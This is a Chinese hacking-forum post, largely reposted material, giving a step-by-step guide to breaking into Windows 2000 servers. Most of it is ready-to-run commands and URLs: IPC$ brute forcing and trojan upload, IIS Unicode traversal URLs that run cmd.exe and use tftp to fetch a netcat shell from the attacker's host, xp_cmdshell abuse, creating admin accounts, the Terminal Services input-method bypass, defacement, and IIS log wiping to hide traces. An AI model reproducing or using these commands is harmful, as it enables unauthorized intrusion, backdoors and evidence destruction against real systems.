- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-1-8
- 最后登录
- 2007-1-8
|
[推荐]2000入侵小结 (2)
2000入侵小结(2)
实际四(暴力法和权限升级)
在WIN2000的命令提示符下
这样输入
c:\>newletmein xxx.xxx.xxx.xxx -all -g
xxx.xxx.xxx.xxx是你要攻击的网站的IP地址
然后等待程序执行完毕,如果发现可用的用户名和密码,程序会告诉你,记住这个
用户名和密码,再这样输入(这里假设用户名为ADMIN。密码也是ADMIN)
c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"
程序显示命令完成,接着来
c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start
等显示成功,接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间)
c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg
程序会告诉你这个命令的ID号,等时间一到,用木马连他的机器的65432端口
可以加上自己的密码,和更改端口,目标搞定
2,目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描
到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认
IE将显示application/x_varg,说明这个漏洞存在,然后在PERL下,进行攻击
C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c 一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机
tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe
这里127.0.0.1 是我的TFTP主机,TFTP目录下有NTSRV。EXE木马
如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活
,你再用木马连上对方的机器,搞定
3,目标开了WEB服务,而且有SQL服务,一般SQL服务器开1433端口
如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码,
而且把用户名或者密码写在这里,OK,你已经差不多搞定拉
打开SQL SERVER 7。0 在client network uitlity里输入对方IP,通讯选TCP/IP
端口选1433,然后应用确定,再打开query analyzer SERVER选你要攻击的
IP,用户名和密码输入,连接他,等会,连上拉
在上面这样输入
create proc #1 as exec master..xp_cmdshell'dir c:\'
go
exec #1
按F5执行,会显示对方机器的文件目录,然后用TFTP上传你的木马,并且执行,再用木马连接他
搞定(需要注意的是PROC的号要执行1次换1个,单引号间是命令行)
4,目标开了WEB服务,IIS有漏洞,这里要说现在比较普遍的双字节编码漏洞。理论
这里不说,也说不好,照着干就可以拉。发现目标XXX。XXX。XXX。XXX
在浏览器里输入
http://xxx.xxx.xxx.xxx/.idq
显示路径,WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到对方的文件目录
然后这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
等文件传完,再这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe
木马被启动,用木马连上,搞定。
如果权限不够,我们下面来升级权限
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,
(这三个文件是黑NT毕备的,很多站点可以下载到)
可以到DOS下输入:(下面是NETUSE后的盘,如果不懂,先学NETUSE去)
C:\>copy c:\gasys.dll F:\
1 file(s) copied.
C:\>copy c:\cmd.exe F:\
1 file(s) copied.
C:\>copy c:\getadmin.exe F:\
1 file(s) copied.
至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E :
http://127.1.1.1/scripts/..á�../winnt/system32/cmd.exe?/c+copy+e:\winnt\system32\cmd.exe+e:\inetpub\scripts\hackercn
.exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘:
http://127.1.1.1/scripts/hackercn.exe?/c+net+use+Y:+\\127.1.1.2\E
然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次):
http://127.1.1.1/scripts/..á�../winnt/system32/cmd.exe?/c+copy+Y:\gasys.dll+d:\inetpub\scripts\gasys.dll
http://127.1.1.1/scripts/..á�../winnt/system32/cmd.exe?/c+copy+Y:\cmd.exe+d:\inetpub\scripts\cmd.exe
http://127.1.1.1/scripts/..á�../winnt/system32/cmd.exe?/c+copy+Y:\getadmin.exe+d:\inetpub\scripts\getadmin.exe
好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做:
http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
这样所有的访问者都有了Administrator限权,
然后我们再来新建一个用户名为hacker密码为password的用户:
http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add
然后再把它授予Administrator限权:
http://127.1.1.1/scripts/getadmin.exe?hacker
下来就是进入该系统并制作后门了:
在nt的dos下输入
C:\>net use \\127.1.1.1\ipc$ "password" /user:"hacker"
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:\>copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32
然后用net time来获得对方的时间:
C:\>net time \\127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:\>at \\127.1.1.1 05:43 G_Server.exe
这样我们就完整的实现了一次入侵,别忘了最后要打扫战场
用冰河很讨厌,我个人是不赞成用木马的,我们可以上载其他端口程序。
实践五(简单实用)
我们假设1.29.58.9有这类型漏洞
myip就是我的IP,GIFT是我计算机上共享的文件名。我把NCx99.exe那个文件放到这个目录下了。
http://1.29.58.9/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\gift
时间要长点,多等一会儿。
成功后,你就可以用COPY命令,把NCX99.EXE文件从I盘CP过来了(放在system32或你喜欢的目录下)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+i:\gift\ncx99.exe+c:\inetpub\scripts\ncx99.exe
启动ncx99.exe
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\ncx99.exe
用telnet连上就可以了。
如果权限不够可以用上面我们讲的方法来增加权限。或添加用户。
实践六(打扫战场)
打扫战场
最后一步就是清除我们用到的一些临时文件和测试的文件,伪装一下日志,
免得被发现,这就叫做是打扫战场。然后记得卸载冰河啊,我们不是过去破坏的,
只是为了学习和研究,熟悉入侵的手段和思想,学会分析问题,解决问题,为将来的实战做个练习而已嘛!
所以也不要修改主页啦!给他们的网管留一份e-mail也好啦!
其实,我们传上去的ncx99.exe是netcat的另一个版本,运行后,会把cmd.exe绑定到99端口,
也就是说,运行以后,会在99端口侦听,我们可以用telnet连接。
C:>telnet xxx.xxx.xxx.xxx 99
就看到:
c:\inetpub\scripts>
呵呵,现在就相当于进入他的机器啦,后面的东西不用继续说了吧?键入exit退出后,对方的ncx99也退出啦。如果你真的想要他的管理员账号,那么,我想,最起码可以这样:传个纪录键盘的东东上去,怎么样?比你破解简单多啦!你当然也可以用冰河什么的。你也可以给自己建个账号,方便自己,不过很可能会被发现的啦。
好啦好啦,不再说啦,烦死人了。
如果你用了木马,就要想办法去掉,要不就留到以后用。随你了。
这么一次入侵完成了,我们至少要学会入侵的基本步骤,还有入侵的思维方式啦。
好好体会吧。
实用命令总结:
列目录:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
Copy文件
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\temp
改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp
FIND命令使用
比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as*
添加用户命令
新建一个用户名为hacker密码为password的用户:
http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add
当然命令是构造出来的,利用这些规则我们可以写很多的类似的命令。
也希望大家把自己构造的好的想法和实现贴出来
如果你找不到目标可以去www.goole.com找。
它的危害大家我想都知道了。
呵呵 大家多练习呀 对了好象上面的 ftp 传文件很困难 是吧我也是 呵呵其实有个好工具哦
有了它你就有对 Unicode漏洞的实现 我看哪个工具就是专门给Unicode漏洞用的
工具:
tftpd32.exe(一个FTP服务器)
ncx99.exe(telnet 到99端口)
这两个大家都熟悉吧,其他的不用管。
运行tftpd32.exe
这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。
回到你的浏览器,在地址栏里填入:
http://202.111.111.11/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%???.???.???.???%20GET%20srv.exe%20c:\\inetpub\\scripts\\srv.exe
???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\srv.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情
况而定,srv.exe为被改名的ncx99.exe(自己选名字吧)。
然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。
再使用如下调用来执行ncx99.exe(srv.exe)
http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe
然后您就可以 telnet 202.111.111.11 99
以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定,这只是一个方法。
srv.exe 这个其实就是ncx99.exe 呵呵你也可以自己改名字呀
好了 cgi 就将到着了 要想更深入了解 你还是自己找专门介绍cgi 的文章吧无心的cgi大全就很不错的
好了 该将我最喜欢的 3389 了
什么是 终端服务就是让管理员远程管理计算机的但在输入法里有个致命漏洞
这样就对我们方便多了你可以用上面的ipc 和cgi 漏洞得到管理员权限 在用3389 远程管理
好了该开始将 输入法漏洞了
实际上我把3篇相关文章放到一起呢,我比较喜欢第一种实际测试中也证明非常好用可以完全成功的。
如何利用终端服务入侵远程计算机
by coolweis
coolweis@sina.com
用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。
恶意用户可以通过猜密码进入系统,更危险的是,如果这台机器存在输入法漏洞的话,那么入侵者
可以完全控制这台机器。
下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器:
首先我们确定某台机器的3389端口是开放的:
D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx
Starting nmapNT V. 2.53 by ryan@eEye.com
eEye Digital Security (
http://www.eeye.com
/ )
based on nmap by fyodor@insecure.org (
www.insecure.org/nmap
/ )
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):
Port State Service
3389/tcp open msrdp
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds
D:\TOOLS\nmapNT\Nmapnt>
现在我们已经可以看到这台机器的终端服务是开放的,那么我们就可以开始行动了。
打开终端服务客户端,添上IP地址,选择连接。
稍等片刻,一般是很快的,就会出现熟悉的登陆对话框了,这是我们看看有没有输入法的漏洞。有关
输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢?经过多次的研究试验。
终于想出了一个办法。我们发现在跳至url后,我们双击winnt目录下的explorer.exe并没什么反应(是
机上已经运行了,可是我们为什么看不到结果呢?),如果我们不断的进行双击,或者什么也不做,一
会儿连接将被断开,在断开的一霎那,我们似乎看到了我们双击出来的窗口。经过几次试验,我们发现
不登陆进去是不行的,将会被服务端断开。于是想办法先登陆进去,我想到了在帮助中打开用户管理器,
经过试验,在跳至url中添入:mk MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm
在右侧会出现一个可以打开本地用户和组的管理器的链接,本来在正常情况下是可以打开这个管理器的,
可是在没有登陆进去的时候就是出不来,于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳
至url中输入:c:\winnt\system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中,
C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
TSinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
主题:到他机器去跳舞(输入法漏洞之完全心得及问题)
elise
初级会员
发贴数量: 13
来自:
注册日期: Jan 2001
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx……:(
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^)
问题(高手请赐教):
1.如果IE下的www访问需要密码,怎办?
2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功!
3.如果对方139 port不开,有什么办法打开吗?w2k server中怎样控制139端口?
88了,小女子要走了,衷心希望各位高手、Cool GG不要对小女子保守哦,没人帮助的自学好艰苦!:((
Homepage;elise.51.net mailtoorelise@263.net QQ:[7175215]
windows2000的终端服务程序是以图开界面远程访问主机的3389端口,而微软的windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远程入侵一台主机。
1、用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。
2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。
3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。
4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。
5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe.
6、选择"保存到磁盘"。
7、选择目录:c:\inetpub\scripts\
8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧)
9、输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp
这是一个简单的例子,同志们可别用来对付国内的站点,因为这样的漏洞实在太多。
这个也是我转来得 呵呵上面讲的很详细了 好好看呀 第一个很实际可行的 呵呵
呵呵 3389 我的最爱 要是漏洞都想这个这么好找好用就好了
下面是什么 呢? 呵呵就 SQL
我建议大家看 流光的帮助 SQL使用说明 上面太详细了 要不我怎么说流光好呢 帮助都那样的傻瓜
还有就是关于IIS5.0 的益出 这个呀 还是看帮助对了小榕网站的说明比自带的帮助还要好理解:P
在别处还有别的IIS5.0益出的程序大家可以好好看看 呵呵用中英文的还有日语什么的都全了 原理差不多
小榕新出的 嗅探器很不错的呵呵 没事可以试试的呵呵
对了安全第一呀 呵呵
小榕早给我们准备好了 就是哪个可以删除指定ip的 程序 可以该名用的
CleanIISLog ReadMe
CleanIISLog是一个清除IIS LOG记录的工具,和其他工具相比有以下不同点:
1、可以清除指定的的IP连接记录,保留其他IP记录。
2、当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog |<.> |<.>
: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件
(注意:处理所有日志文件需要很长的时间)。
: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不
推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。
比如把CleanIISLog该名成 MDJY
命令就 mdjy . **.**.**.**
呵呵 当然是要是在肉鸡上运行呀 呵呵还必须是Administrators权限
其实这些都是皮毛 很多的还是要我门自己活学活用的
上面有很多的错字和没有标点的地方还请大家见量呵呵
上面大多是我转载的 根本不是原创 不要误会了 人这个东西呀 要我怎么说呀~~!!!!!!!!!!!
|
|
